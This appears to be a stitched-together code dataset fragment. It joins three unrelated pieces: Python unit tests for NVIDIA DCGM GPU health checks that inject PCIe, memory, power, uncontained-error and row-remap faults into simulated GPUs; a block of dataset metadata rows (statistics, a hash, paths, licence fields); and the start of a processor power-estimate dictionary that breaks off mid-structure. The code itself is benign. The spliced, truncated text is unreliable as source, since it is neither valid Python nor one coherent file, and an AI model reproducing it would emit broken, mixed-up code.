    if responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM:
        # The memory error is in position 0 here
        assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_VOLATILE_DBE_DETECTED)
        # PCIE error is in position 1 here
        assert (responseV4.incidents[1].system == dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
        assert (responseV4.incidents[1].error.code == dcgm_errors.DCGM_FR_PCI_REPLAY_RATE)
    else:
        assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
        assert (responseV4.incidents[1].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
        # Mem is in position 1 now
        assert (responseV4.incidents[1].error.code == dcgm_errors.DCGM_FR_VOLATILE_DBE_DETECTED)
        assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_PCI_REPLAY_RATE)
# Simultaneous PCIe + memory failure reporting, run against both engine modes.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus()
def test_health_check_standalone_multiple_failures(handle, gpuIds):
    helper_health_check_multiple_failures(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus()
def test_health_check_embedded_multiple_failures(handle, gpuIds):
    helper_health_check_multiple_failures(handle, gpuIds)
def helper_health_check_unreadable_power_usage(handle, gpuIds):
    """
    Verifies that a blank (unreadable) power usage sample is reported as a
    WARN incident with error code DCGM_FR_POWER_UNREADABLE.
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_POWER
    groupObj.health.Set(newSystems)

    # Inject a blank FP64 power-usage reading at offset 50 (offset semantics
    # per dcgm_internal_helpers.inject_field_value_fp64).
    ret = dcgm_internal_helpers.inject_field_value_fp64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_POWER_USAGE,
                                                        dcgmvalue.DCGM_FP64_BLANK, 50)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_POWER)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_WARN)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_POWER_UNREADABLE)
# Unreadable power usage detection, run against both engine modes.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus()
def test_health_check_standalone_unreadable_power_usage(handle, gpuIds):
    helper_health_check_unreadable_power_usage(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus()
def test_health_check_embedded_unreadable_power_usage(handle, gpuIds):
    helper_health_check_unreadable_power_usage(handle, gpuIds)
def helper_health_set_version2(handle, gpuIds):
    """
    Verifies that the watch interval and max-keep-age passed to health.Set()
    are propagated to the cache manager for the underlying watched field
    (PCIE_REPLAY_COUNTER for the PCIE watch system).
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetGroupWithGpuIds("test1", gpuIds)
    watchInterval = 999999        # compared against monitorFrequencyUsec below
    maxKeepAge = 1234.5           # seconds; converted to usec for the comparison
    maxKeepAgeUsec = int(maxKeepAge * 1000000)

    fieldId = dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER
    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_PCIE
    groupObj.health.Set(newSystems, watchInterval, maxKeepAge)

    # Every GPU in the group must now have a cache-manager watch on the field
    # with our exact interval and retention.
    for gpuId in gpuIds:
        cmfi = dcgm_agent_internal.dcgmGetCacheManagerFieldInfo(handle, gpuId, fieldId)
        assert cmfi.flags & dcgm_structs_internal.DCGM_CMI_F_WATCHED, "x%X" % cmfi.flags
        assert cmfi.monitorFrequencyUsec == watchInterval, "%d != %d" % (cmfi.monitorFrequencyUsec, watchInterval)
        assert cmfi.maxAgeUsec == maxKeepAgeUsec, "%d != %d" % (cmfi.maxAgeUsec, maxKeepAgeUsec)
# health.Set() v2 parameter propagation, run against both engine modes with
# two injected GPUs.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus(2)
def test_health_set_version2_standalone(handle, gpuIds):
    helper_health_set_version2(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus(2)
def test_health_set_version2_embedded(handle, gpuIds):
    helper_health_set_version2(handle, gpuIds)
def helper_test_dcgm_health_check_uncontained_errors(handle, gpuIds):
    """
    Verifies that the health check will fail if we inject an uncontained error
    (XID 95) while the MEM watch system is enabled.
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
    groupObj.health.Set(newSystems)
    skip_test_if_unhealthy(groupObj)

    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_XID_ERRORS,
                                                       95, 0) # set the injected data to now
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    # XID 95 must surface as a single FAIL incident with the uncontained-error
    # code, and drag overallHealth down to FAIL.
    assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_UNCONTAINED_ERROR)
# Embedded-engine wrapper for the uncontained-error (XID 95) check.
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus(2)
def test_dcgm_health_check_uncontained_errors(handle, gpuIds):
    helper_test_dcgm_health_check_uncontained_errors(handle, gpuIds)
def helper_test_dcgm_health_check_row_remap_failure(handle, gpuIds):
    """
    Verifies that the health check will fail if we inject a row remap failure
    while the MEM watch system is enabled.
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
    groupObj.health.Set(newSystems)
    skip_test_if_unhealthy(groupObj)

    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ROW_REMAP_FAILURE,
                                                       1, 0) # set the injected data to now
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    # The row remap failure must surface as a single FAIL incident and drag
    # overallHealth down to FAIL.
    assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_ROW_REMAP_FAILURE)
# Embedded-engine wrapper for the row-remap-failure check.
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus(2)
def test_dcgm_health_check_row_remap_failure(handle, gpuIds):
    helper_test_dcgm_health_check_row_remap_failure(handle, gpuIds)
| 45.498797
| 159
| 0.756896
| 7,485
| 56,737
| 5.382766
| 0.060254
| 0.04696
| 0.049144
| 0.040109
| 0.881732
| 0.867709
| 0.855324
| 0.842815
| 0.828965
| 0.803599
| 0
| 0.017645
| 0.163932
| 56,737
| 1,246
| 160
| 45.535313
| 0.83171
| 0.124152
| 0
| 0.731678
| 0
| 0
| 0.0128
| 0.000895
| 0
| 0
| 0
| 0
| 0.202128
| 1
| 0.088652
| false
| 0.004728
| 0.018913
| 0
| 0.108747
| 0.001182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
534e651110d0282604cd43c274b22eae055619ea
| 68,580
|
py
|
Python
|
scripts/sampleOutputs/bkup/cmp_namdgromacscalculixcactusADM_reverse/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
scripts/sampleOutputs/bkup/cmp_namdgromacscalculixcactusADM_reverse/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
scripts/sampleOutputs/bkup/cmp_namdgromacscalculixcactusADM_reverse/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.315901,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.450812,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.8361,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.653476,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.13158,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.648995,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.43406,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.364435,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 8.81851,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.346878,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.023689,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.284279,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.175195,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.631157,
'Execution Unit/Register Files/Runtime Dynamic': 0.198884,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.773479,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.76805,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 5.25717,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000743737,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000743737,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000646759,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000249805,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00251669,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00465092,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00716787,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.168419,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.389567,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.572027,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.14183,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.098595,
'L2/Runtime Dynamic': 0.0212693,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.41252,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.5062,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.167436,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.167436,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.20641,
'Load Store Unit/Runtime Dynamic': 3.49938,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.41287,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.825739,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.146529,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.147985,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0639356,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.811814,
'Memory Management Unit/Runtime Dynamic': 0.211921,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 30.4658,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.21018,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0479776,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.315686,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.57384,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 11.7054,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.136084,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.309574,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.797652,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.251785,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.40612,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.204996,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.862902,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.165679,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.5166,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.150694,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.010561,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.124765,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0781051,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
